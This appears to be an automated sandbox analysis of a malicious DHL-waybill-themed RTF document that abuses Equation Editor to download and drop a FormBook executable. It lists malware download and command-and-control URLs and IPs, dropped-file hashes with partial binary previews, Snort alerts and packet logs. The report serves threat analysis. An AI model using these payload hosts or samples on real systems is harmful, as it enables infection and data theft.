	SUPPLY_PRICE_ORDER_9978484DF.exe	Get hash	malicious	Browse	www.ff4c3dgsp.xyz/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw==
	Payment_Breakdown_pdf.exe	Get hash	malicious	Browse	www.xlff08161z6b239.xyz/ons5/?3f-=dV1HNRUKQAWmuWwulpLGpeH60htmSo5o/mC4LpNZY1M8X1pV+bTt0ziROeFd8wC1X41C&YR-0=y48tk6C

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com	MT103-259602.xlsx	Get hash	malicious	Browse	3.19.116.195
hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com	1T4ebkIp2V.exe	Get hash	malicious	Browse	3.18.7.81
www.ktieman.com	wbfYfA2X7n.exe	Get hash	malicious	Browse	75.2.60.5
	Dhl_AWB5032675620,pdf.exe	Get hash	malicious	Browse	75.2.60.5
	PO202104-114 - APQ Comercial Apoquindo,pdf.exe	Get hash	malicious	Browse	104.21.37.12
www.atlasconcretos.com	Dhl_AWB5032675620,pdf.exe	Get hash	malicious	Browse	167.99.163.124
www.ridvanyilmaz.com	UFSBdiyhVa.exe	Get hash	malicious	Browse	104.21.53.218

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	x86	Get hash	malicious	Browse	161.35.115.218
	arm	Get hash	malicious	Browse	157.245.157.89
	dxvUCghxnR.exe	Get hash	malicious	Browse	139.59.222.220
	vm006793.46sec507 4.html	Get hash	malicious	Browse	162.243.189.2
	kaIpT6BFRs.exe	Get hash	malicious	Browse	188.166.172.139
	FINAL_REVISED_PI.xlsx	Get hash	malicious	Browse	188.166.172.139
	_ -4 page(s) -#416059328.html	Get hash	malicious	Browse	134.122.40.189
	Aviso 9858.xlsm	Get hash	malicious	Browse	128.199.192.135
	4po9pkxprt.exe	Get hash	malicious	Browse	128.199.253.44
	luitJZXQAc	Get hash	malicious	Browse	157.230.180.159
	ATT6957.html	Get hash	malicious	Browse	188.166.164.144
	ATT4561.html	Get hash	malicious	Browse	162.243.189.2
	gfphKYRl36	Get hash	malicious	Browse	46.101.223.83
	oqp4J5JO9B	Get hash	malicious	Browse	46.101.223.83
	3uADP8PxtH	Get hash	malicious	Browse	82.196.128.205
	3Lsu3aUVT8	Get hash	malicious	Browse	46.101.223.83
	5RxT2C1SRd	Get hash	malicious	Browse	46.101.223.83
	LT7qZl0DTe	Get hash	malicious	Browse	46.101.223.83
	C6ZRqVivPO	Get hash	malicious	Browse	46.101.223.83
AMAZON-02US	youYou.dll	Get hash	malicious	Browse	13.32.103.34
	cutie.arm5	Get hash	malicious	Browse	34.249.145.219
	HAN1zw41rv.exe	Get hash	malicious	Browse	76.76.21.21
	f0vkPIEOgI.exe	Get hash	malicious	Browse	3.64.163.50
	SecuriteInfo.com.Win64.Kryptik.CTU.29173.dll	Get hash	malicious	Browse	143.204.91.75
	rKzQII3a1F	Get hash	malicious	Browse	54.92.67.224
	PwUs4oWFJT.exe	Get hash	malicious	Browse	143.204.91.75
	SDGU7w7WFN.exe	Get hash	malicious	Browse	143.204.91.75
	wD9I6UVdtv.exe	Get hash	malicious	Browse	143.204.91.75
	vcimanagement.arm7	Get hash	malicious	Browse	54.171.230.55
	HyfcliVIXs.exe	Get hash	malicious	Browse	143.204.91.75
	B68556F0B5245DB3D9A3DBCF66CCDDA912A82B2E45E55.exe	Get hash	malicious	Browse	18.191.185.143
	la.bot.arm	Get hash	malicious	Browse	54.171.230.55
	Dd2PKQ2e6b	Get hash	malicious	Browse	34.249.145.219
	nr1tUMxVp5	Get hash	malicious	Browse	54.171.230.55
	MiqqslvO3r	Get hash	malicious	Browse	34.249.145.219
	SecuriteInfo.com.Trojan.Linux.Generic.202111.9987.29786	Get hash	malicious	Browse	34.249.145.219
	f6Y6Q3u1yu.exe	Get hash	malicious	Browse	99.86.107.74
	battlefield_installer.exe	Get hash	malicious	Browse	104.192.141.1
	e6xxQSNi2H	Get hash	malicious	Browse	13.225.74.202

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LaXgQ8hib9fwKQI[1].bat Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1041408
Entropy (8bit):	7.950490959998567
Encrypted:	false
SSDEEP:	24576:GE02NgQNfbYNcmRHoos6VIN7E3vYrkXEYRSogDnlSL:G52NPWo16E7E3ukUYQogD4
MD5:	14E865F28F1A02890383D2EC6638E6F9
SHA1:	15A68C4A8F4D62AB76E5DD809FD97FB6C57D2027
SHA-256:	6FAFCA0825DBDEDF739D4F57EA1B09563EED9834A54F2998B712891BAEEF4839
SHA-512:	D61F3BEB4EE58A0C43B386D736E14983EDE502B3B09F7B72F21F9E6D5852E4711F9B4AC7AB9254929DE94CCBCBB753DE817C0366D667EE941B4401ED10577CC3
Malicious:	true
Reputation:	low
IE Cache URL:	http://2.56.57.187/LaXgQ8hib9fwKQI.bat
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&}.a................................. ........@.. .......................@............@.................................X...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............k......>...h................................................0..............0..[.........}.....(.... ..12 ^.5&a%..^E........"...........+ .. ...#Z ...[a+... ..3nZ ..A.a+..(.......0..X.........}.....(.... ..[ a...a%...^E............&.......\...............I.......6.......8.....{......(....o..... P..2Z .A[.a+... ....Z .O:.a+... ...4Z K.*a8w..... .\..Z /.W3a8d....{.....(....o...... ....Z ....a8@....{.....(....o..... ...Z ....a8...... ."..Z !..Na8...... .n..Z .\|.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	228352
Entropy (8bit):	7.977892775814791
Encrypted:	false
SSDEEP:	3072:IQPF21gJUauKFlVRVkHkOUepZHW2HrfU8xaADW2y2l0V64b8IdCEFjvQtwK2UHnQ:R921g+axlnJY2yzrF0iEpvBUHn2ezy1
MD5:	2FF28DA7D07E23085602A8AC2AD678A1
SHA1:	63DACD4FAA4477C3D09F29BAA103132CCE3CE214
SHA-256:	C59A25894D569BC17FCE61A4ED46A9F4DABB6F53689998D31EBBD2D757DA506D
SHA-512:	3FBED2239395269E0BAEA84A59B1FA8B799EE5B4673618FB957AC5D69BB6B916E01BD3D006D21DD87A08B4A449CF931057D30D30AA744275A3DE96C1CE7C8F0F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{83D14D7F-928D-49DC-9ED2-62271FF22E99}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	2.004687743801506
Encrypted:	false
SSDEEP:	12:6gW5lNihm0cl52KCXIXqOzlVFIGCs4k5uFJAl/buvq2ZA:WlNiQXl52fIquVDD50K/bunA
MD5:	063C20EC3659BEA06A2A96F0AF928874
SHA1:	FABAE5C7E70D881046648054E19A3B4AB3D2A202
SHA-256:	EB5EC326385E1E1A10847AC894D450C3638840943344ACCFF561C06D8F7D4547
SHA-512:	B267D894075DF83ED1D87C92DB3C7063DEA8EC09DF54CA2694A67C5AD758C89B07B0C693C2E41547B02C206A0A867F390BAA00058157DB4582F146E7E0F84C4B
Malicious:	false
Reputation:	low
Preview:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.9.2.5.1.4.7.7. . . . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .h.I.8.1.b.l.T.1.o.k.s.v.y.v.f.q.Y.Q.j.C.7.5.u.V.t.q.d.X.S.V.q.X.n._.1.Y.K.a.3.8.p.a.g.X.2.2.S.B.R.w.a.S.o.d.Q.R.c.C.0.4.r.D.y.S.5.c.k.Q.c.0.s.M.5.2.i.I.C.9.G.F.l.U.N.k.w.9.6.j.l.b.K.b.s.P.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A29B523B-0D1C-4716-BA51-DCCF135A5BFC}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Dhl Waybill Document.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Wed Dec 15 21:47:15 2021, length=445497, window=hide
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	4.584108088448673
Encrypted:	false
SSDEEP:	12:8dSpgXg/XAlCPCHaXeBhB/OW9qX+WJtduiMicvbOdLV9mDtZ3YilMMEpxRljKiT8:84/XTuzLI/zneqsDv3q/Qd7Qy
MD5:	8243C12A0CFC693A29A281595E079CF9
SHA1:	B3E954B1270CE04230971FD1AD91B4C3B45E5067
SHA-256:	86F36D684CD28F419309B24A882A77A0A6E6FD0AC3800BBE135B21EE304187C4
SHA-512:	A8C0A17989C86C9B7219A75E4967E2382A0B1AD1873BE10C0F08E861EAEE766F034226545F8027ADCE3A00102AB0FB148BB01016C0A1408723B615865A20B40D
Malicious:	false
Preview:	L..................F.... ...dj.>...dj.>...........9............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S ....&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.9....S. .DHLWAY~1.DOC..^.......S...S...........................D.h.l. .W.a.y.b.i.l.l. .D.o.c.u.m.e.n.t...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Dhl Waybill Document.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.h.l. .W.a.y.b.i.l.l. .D.o.c.u.m.e.n.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	91
Entropy (8bit):	4.833313360583916
Encrypted:	false
SSDEEP:	3:bDuMJl5RQld2mX1bJF7Qld2v:bCyRQPbF7QPI
MD5:	6C8A61425F86EE87568C9820144A33DB
SHA1:	7815573A0CF43355BC72D76AB2F1966644179B3C
SHA-256:	BCF4A52165AF4CD01F4BB3C2159ACCD13C3BD25C6B8865F3BA56BF816E5A09C8
SHA-512:	91C88AF5F2A0F54C3CAD5ED653DD6FC86C080028236537DC539B0A3B6ED2D25EA0B8858B553CFD75626CC37850215D316E8E129E9541D276A100DA2E8CD03FB3
Malicious:	false
Preview:	[folders]..Templates.LNK=0..Dhl Waybill Document.LNK=0..[doc]..Dhl Waybill Document.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\hkdf.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1041408
Entropy (8bit):	7.950490959998567
Encrypted:	false
SSDEEP:	24576:GE02NgQNfbYNcmRHoos6VIN7E3vYrkXEYRSogDnlSL:G52NPWo16E7E3ukUYQogD4
MD5:	14E865F28F1A02890383D2EC6638E6F9
SHA1:	15A68C4A8F4D62AB76E5DD809FD97FB6C57D2027
SHA-256:	6FAFCA0825DBDEDF739D4F57EA1B09563EED9834A54F2998B712891BAEEF4839
SHA-512:	D61F3BEB4EE58A0C43B386D736E14983EDE502B3B09F7B72F21F9E6D5852E4711F9B4AC7AB9254929DE94CCBCBB753DE817C0366D667EE941B4401ED10577CC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&}.a................................. ........@.. .......................@............@.................................X...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............k......>...h................................................0..............0..[.........}.....(.... ..12 ^.5&a%..^E........"...........+ .. ...#Z ...[a+... ..3nZ ..A.a+..(.......0..X.........}.....(.... ..[ a...a%...^E............&.......\...............I.......6.......8.....{......(....o..... P..2Z .A[.a+... ....Z .O:.a+... ...4Z K.*a8w..... .\..Z /.W3a8d....{.....(....o...... ....Z ....a8@....{.....(....o..... ...Z ....a8...... ."..Z !..Na8...... .n..Z .\|.

C:\Users\user\Desktop\~$l Waybill Document.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.010478742441121
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Dhl Waybill Document.doc
File size:	445497
MD5:	3e1816aaa393b5390f39b107a6d3b96d
SHA1:	6000cb396cd1a62f28ec7545ac9d05ee3117b9eb
SHA256:	e86affe17004b9e6f5eec414528a0029ca56da53981a13763c3c7ad8161df5f9
SHA512:	f0a22016f1073b0fd6949f92a45cb25c91b244641ea2c5179eb6bb0be41a222031f47bcc688db93c19b6a1747888a049a97f7a4e21023b1fe3749ec1bc498c16
SSDEEP:	12288:At5EDjYHPn+ojviQSqmsnqoqBcwcwhVzFM7uOSKROQbfLPoHWJVe52GcUlHJ:0EXmfvtUJzFMaOTxfLPPJ3GcUlp
File Content Preview:	{\rtf4968{\object29251477 29251477 \objhtml8972970\~\objupdate9168573391685733 \objw993\objh5187{\*\objdata140571 {{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{\bin00000

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000114h								no
1	000000CFh								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/15/21-14:49:16.181896	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	109.71.253.24
12/15/21-14:49:16.181896	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	109.71.253.24
12/15/21-14:49:16.181896	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	109.71.253.24
12/15/21-14:49:39.561286	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49171	34.102.136.180	192.168.2.22
12/15/21-14:49:44.886117	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49172	80	192.168.2.22	147.124.221.147
12/15/21-14:49:44.886117	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49172	80	192.168.2.22	147.124.221.147
12/15/21-14:49:44.886117	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49172	80	192.168.2.22	147.124.221.147
12/15/21-14:49:50.799090	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49173	80	192.168.2.22	75.2.60.5
12/15/21-14:49:50.799090	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49173	80	192.168.2.22	75.2.60.5
12/15/21-14:49:50.799090	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49173	80	192.168.2.22	75.2.60.5
12/15/21-14:49:56.325464	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49174	80	192.168.2.22	23.225.139.107
12/15/21-14:49:56.325464	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49174	80	192.168.2.22	23.225.139.107
12/15/21-14:49:56.325464	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49174	80	192.168.2.22	23.225.139.107

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2021 14:47:52.138319969 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.164386988 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.164627075 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.165010929 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.195635080 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195692062 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195739985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.195755959 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195764065 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.195796013 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195802927 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.195835114 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195838928 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.195874929 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195878029 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.195929050 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195931911 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.195965052 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.195971012 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.196005106 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.196011066 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.196047068 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.196058035 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.196090937 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.209711075 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221541882 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221601009 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221606970 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221640110 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221651077 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221678972 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221681118 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221716881 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221743107 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221780062 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221782923 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221822023 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221822977 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221860886 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221863031 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221899986 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221901894 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221939087 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221941948 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.221977949 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.221978903 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222018003 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222018957 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222065926 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222069025 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222105980 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222106934 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222142935 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222146988 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222182989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222187042 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222224951 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222227097 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222263098 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222265959 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222301960 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.222305059 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.222342968 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.225303888 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.247714043 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.247785091 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.247800112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.247840881 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.247842073 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.247879028 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.247880936 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.247920036 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.247920036 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.247955084 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.247960091 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248001099 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248001099 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248040915 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248040915 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248076916 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248080969 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248131037 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248132944 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248168945 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248171091 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248205900 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248209953 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248246908 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248249054 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248284101 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248289108 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248327017 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248328924 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248367071 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248368025 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248404026 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248409033 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248445034 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248447895 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248488903 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248492956 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248531103 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248569965 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248583078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248589993 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248605967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248605967 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248641014 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.248646021 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.248684883 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.249155998 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.273998976 CET	80	49165	2.56.57.187	192.168.2.22
